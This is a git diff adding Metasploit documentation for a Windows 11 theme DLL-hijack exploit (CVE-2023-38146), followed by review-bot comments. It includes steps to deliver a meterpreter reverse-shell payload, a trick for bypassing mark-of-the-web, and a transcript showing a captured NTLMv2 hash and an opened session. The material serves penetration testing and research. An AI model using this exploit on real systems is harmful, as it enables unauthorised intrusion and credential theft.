diff --git a/documentation/modules/exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146.md b/documentation/modules/exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146.md new file mode 100644 index 000000000000..11690d31fe0e --- /dev/null +++ b/documentation/modules/exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146.md 
@@ -0,0 +1,121 @@ +## Description + +There exists a time of check to time of use vulnerability in the way Windows 11 loads msstyles files when they are +via a theme file. When a user opens a theme which references an msstyles file with a `PACKME_VERSION` +of 999, the process will check for the presence of the msstyles file appended with "_vrf.dll". If the file is found, +the process will open the file to check for a signature. If the signature is valid, the process closes the file and +then loads it. By closing the file after the check and before loading it, we can feed a legitimate signed dll to the +check read, and then substitute a malicious dll for the second, resulting in the process loading our dll and executing +arbitrary code. + +To achieve this race condition, we implement a UNC path pointing back to an SMB server we control that uses the type +of request issued by the SMB client to decide to server the legitimate file or the payload file. + +Because the PACKME_VERSION must be 999, this module includes a tool to take a normal windows aero.msstyles file +and populate it with the required PACKME_VERSION. As the aero.msstyles file is also a signed binary, we can use it +as both the msstyles file and the legitimate signed dll file. + +As a final step, a user may convert the resultant theme file into a themepack file by using the linux command +`lcab exploit.theme exploit.themepack` +By converting this into a themepack file rather than a theme file, it circumvents the "mark of the web" and will no +longer result in a security warning dialog box before opening. + +## Vulnerable Application + +Windows 11 + +## Verification Steps + +1. `./msfconsole` +2. `set payload windows/x64/meterpreter_reverse_tcp` +3. `set LHOST ` +4. `set LPORT ` +5. `set STYLE_FILE` +6. `set DisablePayloadhandler false` +7. `run` +8. [OPTIONAL] Convert the theme file to a themepack file with the Linux command `lcab exploit.theme exploit.themepack` +9. 
Copy theme or themepack file over to target. + +## Scenarios + +### Windows 11 + +``` +msf6 > use exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146 +[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > show options + +Module options (exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SHARE no Share (Default Random) + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the loc + al machine or 0.0.0.0 to listen on all addresses. + SRVPORT 445 yes The local port to listen on. + STYLE_FILE yes The Microsoft-signed .msstyles file (e.g. aero.msstyles). + STYLE_FILE_NAME yes The name of the style file to reference. + THEME_FILE_NAME exploit.theme yes The name of the theme file to generate. + + +Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 10.5.135.201 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows + + + +View the full module info with the info, or info -d command. 
+ +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set SRVHOST 10.5.135.201 +SRVHOST => 10.5.135.201 +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE '/home/tmoose/rapid7/metasploit-framework/aero.msstyles' +STYLE_FILE => /home/tmoose/rapid7/metasploit-framework/aero.msstyles +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE_NAME aero +STYLE_FILE_NAME => aero +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set verbose true +verbose => true +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > +[*] Started reverse TCP handler on 10.5.135.201:4444 +[*] Server is running. Listening on 10.5.135.201:445 +[*] Server started. +[+] exploit.theme stored at /home/tmoose/.msf4/local/exploit.theme +[*] Received SMB connection from 10.5.132.136 +[SMB] NTLMv2-SSP Client : 10.5.132.136 +[SMB] NTLMv2-SSP Username : .\msfuser +[SMB] NTLMv2-SSP Hash : msfuser::.:571cefb4150fb5f1:059699f9eee7e044d95167c03c58c6b4:010100000000000000326d46a633da013654631d1e8ef262000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080000326d46a633da0106000400020000000800300030000000000000000100000000200000fe746065d66cc1efc7756d546af110124dd7d6b60126a5edff7b41cce14019d90a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000 + +[*] Sending file to 10.5.132.136 +[*] Sending stage (200774 bytes) to 10.5.132.136 +[*] Server stopped. 
+[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.136:50003) at 2023-12-20 18:40:25 -0600 + +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > sessions -i -1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +Computer : DESKTOP-7M0LC28 +OS : Windows 11 (10.0 Build 22000). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > getuid +Server username: DESKTOP-7M0LC28\msfuser +meterpreter > + +```
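Review bot: Under "Vulnerable Application" the only text is "Windows 11", which does not tell a reader which builds are affected or which update closes the issue; the Scenarios output shows "Windows 11 (10.0 Build 22000)", so at minimum list the tested build and state the fixed version. In the Description, the first sentence is missing a word ("when they are via a theme file") and the second paragraph has "decide to server the legitimate file" where "serve" is meant. `PACKME_VERSION` is backticked once and bare twice, so pick one form. The third paragraph says the module "includes a tool" to populate the version field, but the document never gives the tool's location or how it is invoked, and no option in the `show options` table appears to correspond to it; either document it or clarify that the module does this automatically from `STYLE_FILE`.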
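Review bot: The Verification Steps cannot be followed as written: there is no `use exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146` step, and steps 3 to 5 (`set LHOST `, `set LPORT `, `set STYLE_FILE`) carry no value placeholder, which suggests angle-bracket placeholders were lost in rendering; write them in a form that survives Markdown, for example `set LHOST [attacker IP]`. The steps also omit `SRVHOST` and `STYLE_FILE_NAME`, both of which the Scenarios run sets and the second of which is marked required with no default in the options table. Step 2 selects `windows/x64/meterpreter_reverse_tcp` while the Scenarios transcript uses the default `windows/x64/meterpreter/reverse_tcp`; align the two or say that either works. The list ends at copying the file to the target, so add a final step stating what the tester should observe (the theme is opened on the target and a session is created). A short Options section describing `SHARE`, `STYLE_FILE`, `STYLE_FILE_NAME` and `THEME_FILE_NAME` would match the usual layout of these module documents.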
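Review bot: The Scenarios transcript commits a complete `[SMB] NTLMv2-SSP Hash` line for `msfuser` along with a developer home path (`/home/tmoose/...`) and lab addresses; truncate or replace the hash with a placeholder before merging, since a full challenge/response does not belong in documentation even for a lab account. The same lines show that the module's SMB server records the client's NTLMv2 authentication as a side effect, which the Description does not mention; one sentence noting that would help readers understand what the module logs. The `SRVHOST` row in the options table is broken mid-word ("on the loc" / "al machine"), so re-wrap the captured output. The transcript also prints "Exploit completed, but no session was created." immediately before the session opens; add a line of prose explaining that the module runs as a background job and the session arrives only once the theme file is opened on the target, so the message is not read as a failure.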